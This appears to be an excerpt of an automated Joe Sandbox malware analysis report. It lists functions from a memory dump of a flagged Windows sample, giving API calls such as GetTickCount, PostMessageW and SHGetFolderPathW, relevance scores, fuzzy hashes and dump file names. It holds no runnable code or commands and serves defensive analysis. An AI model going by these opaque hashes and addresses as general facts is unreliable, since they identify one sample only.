Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$FocusMessage
String ID:
API String ID: 3376117608-0
Opcode ID: 54760836877d7ea308679fc2fbb067974d626e52727a4783f1aca292cb012f38
Instruction ID: 1d9cf0d1ea3328361e376251e09c355349c8605a82263f8f977a84d7874d0cf4
Opcode Fuzzy Hash: 54760836877d7ea308679fc2fbb067974d626e52727a4783f1aca292cb012f38
Instruction Fuzzy Hash: 58417572104B809AFB57CF26F8447E937A1F38CB98F144126EB8A476B5CB34C481C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140001C48 Relevance: 6.1, APIs: 4, Instructions: 98windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A
GetFocus.USER32 ref: 0000000140002140

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$FocusMessage
String ID:
API String ID: 3376117608-0
Opcode ID: 4d53974599876ddbb9f9464b9af5ec3fa2cf139bde48eb46c203a091238854c5
Instruction ID: c00b3f6a235106adfd11c9eb9a3479aa55852c5f21b5728f409e2f6cedb87129
Opcode Fuzzy Hash: 4d53974599876ddbb9f9464b9af5ec3fa2cf139bde48eb46c203a091238854c5
Instruction Fuzzy Hash: BF416572104B809AFB56CF26F8447E937B1F38CB98F144126EB59576B5DB34C882CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140001C62 Relevance: 6.1, APIs: 4, Instructions: 98windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A
GetFocus.USER32 ref: 0000000140002140

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$FocusMessage
String ID:
API String ID: 3376117608-0
Opcode ID: 5585bd4884c88b14856f6c5918247512757e0af3403f24648fc02b6e71661c6d
Instruction ID: 72dcdbc92e0911e82faed9774c6c93b0f2e28b023da8ec5053ba2a971698630e
Opcode Fuzzy Hash: 5585bd4884c88b14856f6c5918247512757e0af3403f24648fc02b6e71661c6d
Instruction Fuzzy Hash: 2F417572500B809AFB56CF26F8447E937A1F38CB98F544126EB89476B5CB34C482CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140001BF0 Relevance: 6.1, APIs: 4, Instructions: 97windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A
GetFocus.USER32 ref: 0000000140002140

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$FocusMessage
String ID:
API String ID: 3376117608-0
Opcode ID: f7dcb1930cb5a3408f50ff76016e259487bff21e9fe9a28c4a4b5ad6d9a8c87c
Instruction ID: 8b53cbedab81bcd5b9f3a4f9950f157438ee224153062015c5a9ad03a605ad92
Opcode Fuzzy Hash: f7dcb1930cb5a3408f50ff76016e259487bff21e9fe9a28c4a4b5ad6d9a8c87c
Instruction Fuzzy Hash: 13416476204B809AFB56CF26F8447E937B1F78CB98F144126EB4A476B5DB34C881CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140001C3C Relevance: 6.1, APIs: 4, Instructions: 97windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A
GetFocus.USER32 ref: 0000000140002140

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$FocusMessage
String ID:
API String ID: 3376117608-0
Opcode ID: 991ffd40ac100a4ba6478e013dde0f04d33180e20079b1e8aaaa70b2475bac0d
Instruction ID: 86597d57194dd46d7ca2aafd131a1ac5cf91cbab4cbabef65b80b4e37553b4b4
Opcode Fuzzy Hash: 991ffd40ac100a4ba6478e013dde0f04d33180e20079b1e8aaaa70b2475bac0d
Instruction Fuzzy Hash: 9A416372204B409AFB56CF26F8447E937B1F38CB98F144126EB5A476B5DB34C882CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140001C2D Relevance: 6.1, APIs: 4, Instructions: 96windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A
GetFocus.USER32 ref: 0000000140002140

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$FocusMessage
String ID:
API String ID: 3376117608-0
Opcode ID: 840e2d34c6706b51fc9c97a4876a3a34968ad10c8a815e74e2b874ffe0587265
Instruction ID: 833c8a3268c0e59174655066acb5579dcf7dbfa1f375bf83d9f7f9c2cb783a3d
Opcode Fuzzy Hash: 840e2d34c6706b51fc9c97a4876a3a34968ad10c8a815e74e2b874ffe0587265
Instruction Fuzzy Hash: 1F417472204B809AFB57CF26F8447E937A1F78CB98F544126EB8A476B5DB34C482CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140001C5B Relevance: 6.1, APIs: 4, Instructions: 96windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A
GetFocus.USER32 ref: 0000000140002140

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$FocusMessage
String ID:
API String ID: 3376117608-0
Opcode ID: 1b88ecbd4deb658c739f3eb206a05c8ac732cac7e523ba7eda7e96a849464d4a
Instruction ID: 15d1fd9c278a1e8abce026d9dc8c83d48ef7363a4f000ae638376cc6de7c1593
Opcode Fuzzy Hash: 1b88ecbd4deb658c739f3eb206a05c8ac732cac7e523ba7eda7e96a849464d4a
Instruction Fuzzy Hash: 47415272205B409AFB57CF26F8447E937A1F78CB98F544126EB5A476B5DB34C982CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400CCDEC Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001400CCD3D
_invalid_parameter_noinfo.LIBCMT ref: 00000001400CCD48
_errno.LIBCMT ref: 00000001400CCD81
_errno.LIBCMT ref: 00000001400CCD94

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: 9e98120a8e195555edf72ad120129c45298068f11f99e9964a534d5c9f1f3217
Instruction ID: 6c0f50bdd69dee1bb8179626f5a25cec43013e73bb7d52ea302060589ff88690
Opcode Fuzzy Hash: 9e98120a8e195555edf72ad120129c45298068f11f99e9964a534d5c9f1f3217
Instruction Fuzzy Hash: 2321D27522878582FA2B9B13E801BDEA6A5BB4CBD4F044421BF4B47BB5EB3CC4419711

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B25B0 Relevance: 4.5, APIs: 3, Instructions: 41COMMON

Download Yara Rule

APIs

SetForegroundWindow.USER32(?,?,00000000,00000001400B2790,?,?,?,?,?,?,?,?,?,00000001400187B1), ref: 00000001400B25C5
GetForegroundWindow.USER32(?,?,00000000,00000001400B2790,?,?,?,?,?,?,?,?,?,00000001400187B1), ref: 00000001400B25EC
GetWindow.USER32 ref: 00000001400B261A

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Window$Foreground
String ID:
API String ID: 62970417-0
Opcode ID: ee06a0490cff22ef96f5ca5351be9db425f6b806d17f509f6afeed50989a688e
Instruction ID: fd9210b924e6b93a90964a9add371bdfc35463920d6c1d889fd4d848a5a1855e
Opcode Fuzzy Hash: ee06a0490cff22ef96f5ca5351be9db425f6b806d17f509f6afeed50989a688e
Instruction Fuzzy Hash: 1D015E31716A8082EB51CF57F54439AA360E74CFD0F485520FB5A17BA9DB7CC8C28B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140005840 Relevance: 4.5, APIs: 3, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 000000014001EF90: GetSystemMetrics.USER32 ref: 000000014001F028
Part of subcall function 000000014001EF90: LoadCursorW.USER32 ref: 000000014001F06A
Part of subcall function 000000014001EF90: RegisterClassExW.USER32 ref: 000000014001F095
Part of subcall function 000000014001EF90: RegisterClassExW.USER32 ref: 000000014001F0BC

SystemParametersInfoW.USER32 ref: 000000014000586A
SystemParametersInfoW.USER32 ref: 000000014000588D
malloc.LIBCMT ref: 00000001400058B0

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: System$ClassInfoParametersRegister$CursorLoadMetricsmalloc
String ID:
API String ID: 2336117585-0
Opcode ID: 754d1816ab36756e456449ac01376925bc4a3928ece1a8e274a8677a9673e884
Instruction ID: b2bbd7e06d9c04e6c5e52eefc1a3e8da1523ef1ec66eebe4bcc27bcb0ba26e40
Opcode Fuzzy Hash: 754d1816ab36756e456449ac01376925bc4a3928ece1a8e274a8677a9673e884
Instruction Fuzzy Hash: EF015E70B0474081FB5AEB57B8557D66291ABCDB85F8C8039AF4C5B6B2EE3CC5498710

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400AAB70 Relevance: 3.1, APIs: 2, Instructions: 106COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 00000001400AABA6
GetCPInfo.KERNEL32 ref: 00000001400AAC5B

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 875a6bbdb50fc72266c1c8ec1a33478969007426367abc21147bdd9836fdf97a
Instruction ID: d86943663248e7be95c6631b085577b97a2fec81c4c921a019d65925f508522a
Opcode Fuzzy Hash: 875a6bbdb50fc72266c1c8ec1a33478969007426367abc21147bdd9836fdf97a
Instruction Fuzzy Hash: C2414C72604B4086FB66CF26E44439977A1E7AAFA4F489215EB49077E8CB3DC881CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D77B8 Relevance: 3.1, APIs: 2, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001400D77D8
_invalid_parameter_noinfo.LIBCMT ref: 00000001400D77E4

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: e2abaf136ee28f41b5a8625a635adb6a8a947ac5c15a8a6b20e38f870e584f70
Instruction ID: e63d41fb99ca92eadf235c26b8e52a4cbc551d4fd2cb88cb556d3a34e587d885
Opcode Fuzzy Hash: e2abaf136ee28f41b5a8625a635adb6a8a947ac5c15a8a6b20e38f870e584f70
Instruction Fuzzy Hash: 9D21083231478286EB668F2AE5447AD76A0AF487D0F444620BB5E876F5EB38C412CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400569E5 Relevance: 3.1, APIs: 2, Instructions: 51windowtimeCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32 ref: 000000014005687A
SendMessageTimeoutW.USER32 ref: 00000001400568F4
PostMessageW.USER32 ref: 0000000140056925
PostMessageW.USER32 ref: 0000000140056977
SendMessageTimeoutW.USER32 ref: 00000001400569AC
PostMessageW.USER32 ref: 0000000140056A3D

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Message$Post$SendTimeout$ProcWindow
String ID:
API String ID: 2617672042-0
Opcode ID: 8ca7f79e2b2dc012bc1ff6d2a3c25ffc445643e3103d600d79805b545e6dc9f5
Instruction ID: 8a770580ead809c8af5ae64eff4bf4809891c8061968ab8f341cb2aeb6a3b72b
Opcode Fuzzy Hash: 8ca7f79e2b2dc012bc1ff6d2a3c25ffc445643e3103d600d79805b545e6dc9f5
Instruction Fuzzy Hash: 7C117C3571428085EBBACB3794057EA27A1B74DFD4F544926EB49677B5CE3AC842C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B4000 Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 00000001400B4049
MessageBoxW.USER32 ref: 00000001400B406D

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Message$Post
String ID:
API String ID: 3307098700-0
Opcode ID: 49cdd6a307acda08380100e23e01ed57d6742b714445f38a35f1394f16560126
Instruction ID: 644353ba6e0bf4fced860f8daca157a8bfe0b4b728ea7a68d3136756d8a12a3c
Opcode Fuzzy Hash: 49cdd6a307acda08380100e23e01ed57d6742b714445f38a35f1394f16560126
Instruction Fuzzy Hash: D721BEB2614BC085E7669F26B4407DD77A0FBAEF94F098225DB8427A78CB38C185CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400562C2 Relevance: 3.0, APIs: 2, Instructions: 21windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32 ref: 00000001400562D6
DefWindowProcW.USER32 ref: 000000014005687A

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: FocusProcWindow
String ID:
API String ID: 1691694861-0
Opcode ID: ed46a18234adf02086ce3127c657226d14fe2ce3d20d1f4bb72f49cb3fac70ed
Instruction ID: 0ff08309e81e2969859d1666bfff73324adf34881c640ba24db9bc5bb3afd275
Opcode Fuzzy Hash: ed46a18234adf02086ce3127c657226d14fe2ce3d20d1f4bb72f49cb3fac70ed
Instruction Fuzzy Hash: 83F0E536224A84C9D6A6CB53E8083DA7325F78DFE4F944452DF4967778CE39C886C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140069610 Relevance: 1.6, APIs: 1, Instructions: 91COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32 ref: 00000001400696ED

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

